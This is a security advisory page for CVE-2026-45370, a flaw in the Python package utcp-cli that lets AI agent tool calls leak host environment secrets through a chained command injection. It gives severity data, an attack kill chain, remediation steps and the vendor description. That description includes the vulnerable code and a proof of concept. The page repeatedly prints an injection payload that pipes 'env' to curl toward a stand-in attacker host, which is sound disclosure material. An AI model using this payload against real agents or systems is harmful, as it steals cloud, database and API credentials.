CVE-2026-45370 — HIGH (CVSS 7.7)

Q: What systems are affected by CVE-2026-45370?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI tool calling pipelines, LLM orchestration systems, agentic pipelines, CI/CD ML pipelines.

Q: What is the CVSS score for CVE-2026-45370?

CVE-2026-45370 has a CVSS v3.1 base score of 7.7 (HIGH).

CISO Take

CVE-2026-45370 is a cleartext credential exposure flaw in utcp-cli where _prepare_environment() passes a full os.environ copy to every CLI subprocess; when chained with the existing command injection in _substitute_utcp_args() (GHSA-33p6-5jxp-p3x4), a low-privileged attacker can dump every secret in the host process — cloud credentials, database URLs, LLM API keys — with a single crafted tool argument. The blast radius is significant: utcp-cli has 4,826 downstream dependents, and the ubiquitous pattern of loading secrets as environment variables in containerised AI agent deployments makes this a near-universal credential exfiltration primitive for affected stacks. CVSS scope is Changed (S:C), meaning successful exploitation reaches well beyond the vulnerable component to any service reachable with those harvested credentials. There is no workaround prior to 1.1.2; upgrade to utcp-cli >= 1.1.2 immediately, enforce strict inherit_env_vars settings on all CliCallTemplates, and rotate every credential that was accessible in processes running the affected version.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

High risk (CVSS 7.7). Network-accessible attack vector with low complexity, no user interaction, and only low-privilege access required — all conditions typical in multi-user AI agent platforms. Scope is Changed, extending impact beyond the vulnerable component to all downstream systems reachable via the harvested credentials. In production AI agent deployments, the exposed secrets commonly include cloud provider master credentials, LLM API billing keys, and database connection strings, enabling full secondary compromise of infrastructure. The 4,826 downstream dependents create wide ecosystem exposure across AI/ML tooling.

Attack Kill Chain

Tool Argument Injection

Attacker crafts a malicious tool call argument containing shell metacharacters (e.g., '; env | curl -s -d @- https://attacker.com') submitted to an AI agent using utcp-cli.

AML.T0053

Command Injection Execution

_substitute_utcp_args() interpolates the unsanitised argument directly into the shell command template, executing arbitrary attacker-controlled commands in the subprocess.

AML.T0050

Secret Store Exfiltration

_prepare_environment() passes os.environ.copy() to the subprocess; the injected env | curl command serialises all environment variables — including API keys and cloud credentials — to the attacker's server.

AML.T0086

Lateral Movement via Harvested Credentials

Attacker uses harvested LLM API keys, cloud provider credentials, and database connection strings for infrastructure lateral movement, API abuse, and further data exfiltration.

AML.T0055

Tool Argument Injection

Attacker crafts a malicious tool call argument containing shell metacharacters (e.g., '; env | curl -s -d @- https://attacker.com') submitted to an AI agent using utcp-cli.

AML.T0053

Command Injection Execution

_substitute_utcp_args() interpolates the unsanitised argument directly into the shell command template, executing arbitrary attacker-controlled commands in the subprocess.

AML.T0050

Secret Store Exfiltration

_prepare_environment() passes os.environ.copy() to the subprocess; the injected env | curl command serialises all environment variables — including API keys and cloud credentials — to the attacker's server.

AML.T0086

Lateral Movement via Harvested Credentials

Attacker uses harvested LLM API keys, cloud provider credentials, and database connection strings for infrastructure lateral movement, API abuse, and further data exfiltration.

AML.T0055

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
utcp-cli	pip	<= 1.1.1	`1.1.2`
3.4K 4.8K dependents Pushed 6d ago 80% patched ~1d to patch Full package profile →

Do you use utcp-cli? You're affected.

Severity & Risk

CVSS 3.1

7.7 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

Attack Surface

AV Network

AC Low

PR Low

UI None

S Changed

C High

I None

A None

What should I do?

5 steps

Upgrade utcp-cli to >= 1.1.2 immediately — no workaround exists in earlier versions.
After upgrading, audit all CliCallTemplate definitions: set inherit_env_vars to [] (strict mode) for subprocesses that do not need host environment variables, or to an explicit minimal allowlist (e.g., ["PATH", "LANG"]) otherwise.
Rotate all credentials — API keys, cloud secrets, database passwords — accessible in processes that ran utcp-cli < 1.1.2.
Add minimum-version enforcement for utcp-cli to your dependency scanning pipeline (pip-audit, safety, Dependabot).
Instrument tool call argument logging with anomaly detection for shell metacharacter patterns (semicolons, pipes, backticks) as a defence-in-depth measure against future injection attempts.

Classification

Code Execution Data Extraction Data Leakage Agent Framework Plugin AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0055 - Unsecured Credentials AML.T0083 - Credentials from AI Agent Configuration AML.T0086 - Exfiltration via AI Agent Tool Invocation AML.T0098 - AI Agent Tool Credential Harvesting

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk Management System

ISO 42001

A.6.2.6 - Security of AI system

NIST AI RMF

MANAGE 2.2 - Risk Mitigation for AI Systems

OWASP LLM Top 10

LLM06:2023 - Sensitive Information Disclosure LLM07:2023 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-45370?

CVE-2026-45370 is a cleartext credential exposure flaw in utcp-cli where _prepare_environment() passes a full os.environ copy to every CLI subprocess; when chained with the existing command injection in _substitute_utcp_args() (GHSA-33p6-5jxp-p3x4), a low-privileged attacker can dump every secret in the host process — cloud credentials, database URLs, LLM API keys — with a single crafted tool argument. The blast radius is significant: utcp-cli has 4,826 downstream dependents, and the ubiquitous pattern of loading secrets as environment variables in containerised AI agent deployments makes this a near-universal credential exfiltration primitive for affected stacks. CVSS scope is Changed (S:C), meaning successful exploitation reaches well beyond the vulnerable component to any service reachable with those harvested credentials. There is no workaround prior to 1.1.2; upgrade to utcp-cli >= 1.1.2 immediately, enforce strict inherit_env_vars settings on all CliCallTemplates, and rotate every credential that was accessible in processes running the affected version.

Is CVE-2026-45370 actively exploited?

No confirmed active exploitation of CVE-2026-45370 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45370?

1. Upgrade utcp-cli to >= 1.1.2 immediately — no workaround exists in earlier versions. 2. After upgrading, audit all CliCallTemplate definitions: set inherit_env_vars to [] (strict mode) for subprocesses that do not need host environment variables, or to an explicit minimal allowlist (e.g., ["PATH", "LANG"]) otherwise. 3. Rotate all credentials — API keys, cloud secrets, database passwords — accessible in processes that ran utcp-cli < 1.1.2. 4. Add minimum-version enforcement for utcp-cli to your dependency scanning pipeline (pip-audit, safety, Dependabot). 5. Instrument tool call argument logging with anomaly detection for shell metacharacter patterns (semicolons, pipes, backticks) as a defence-in-depth measure against future injection attempts.

What systems are affected by CVE-2026-45370?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI tool calling pipelines, LLM orchestration systems, agentic pipelines, CI/CD ML pipelines.

What is the CVSS score for CVE-2026-45370?

CVE-2026-45370 has a CVSS v3.1 base score of 7.7 (HIGH).

Technical Details

NVD Description

## Summary `_prepare_environment()` in `cli_communication_protocol.py` passes a full copy of `os.environ` to every CLI subprocess. When combined with the Command Injection vulnerability (CWE-78) in `_substitute_utcp_args()` tracked as GHSA-33p6-5jxp-p3x4, an attacker can exfiltrate all process-level secrets in a single tool call. ## Vulnerable Code ```python # cli_communication_protocol.py def _prepare_environment(self, provider: CliCallTemplate) -> Dict[str, str]: env = os.environ.copy() # All secrets inherited if provider.env_vars: env.update(provider.env_vars) return env ``` ## Impact Any environment variable present in the host process is accessible to injected commands. In typical AI agent deployments this includes: - Cloud provider credentials (AWS_SECRET_ACCESS_KEY, AZURE_CLIENT_SECRET) - Database connection strings (DATABASE_URL) - LLM API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY) - Internal service tokens ## Proof of Concept ```python # Tool defined as: {"command": "grep UTCP_ARG_pattern_UTCP_END logfile.txt"} # Attacker supplies: tool_args = {"pattern": "x; env | curl -s -d @- https://attacker.com"} # Executed bash script: # CMD_0_OUTPUT=$(grep x; env | curl -s -d @- https://attacker.com 2>&1) # -> Full env dump sent to attacker including all secrets ``` ## Patched Fixed in `utcp-cli` 1.1.2. `_prepare_environment` no longer copies the full host environment. Inheritance is controlled by a new `CliCallTemplate.inherit_env_vars` field: - `null` (default): a small built-in OS-specific allowlist (`PATH`, `HOME`, `LANG` on Unix; `PATH`, `PATHEXT`, `SYSTEMROOT`, `USERPROFILE`, etc. on Windows) is inherited so shells and binaries continue to work. - `[]`: strict mode -- nothing from the host environment reaches the subprocess; only `env_vars` is propagated. - `["FOO", "BAR"]`: exactly those host variables are inherited (replaces, not merges with, the default allowlist). `env_vars` is always layered on top and overrides any inherited value. Secrets like `OPENAI_API_KEY` no longer reach the subprocess unless the call template explicitly opts them in. ## Mitigation Upgrade to `utcp-cli >= 1.1.2`. There is no workaround in earlier versions short of stripping secrets from the host process before any CLI tool call. ## Credit Reported by @ZeroXJacks.

Exploitation Scenario

An attacker with low-privileged access to an AI agent system — a standard API key or authenticated user session — crafts a tool call where the tool argument contains shell metacharacters: pattern = 'x; env | curl -s -d @- https://attacker.com'. When the agent processes this via utcp-cli < 1.1.2, _substitute_utcp_args() interpolates the argument directly into the shell command template without sanitisation, and _prepare_environment() ensures the subprocess inherits the full os.environ. The injected command executes inside the subprocess, serialising every environment variable into an HTTP POST body transmitted to the attacker's server. Within seconds the attacker receives OPENAI_API_KEY, AWS_SECRET_ACCESS_KEY, DATABASE_URL, and any other loaded secrets, then pivots to LLM API abuse, cloud infrastructure lateral movement, and database exfiltration — all triggered by a single tool call requiring no special tooling.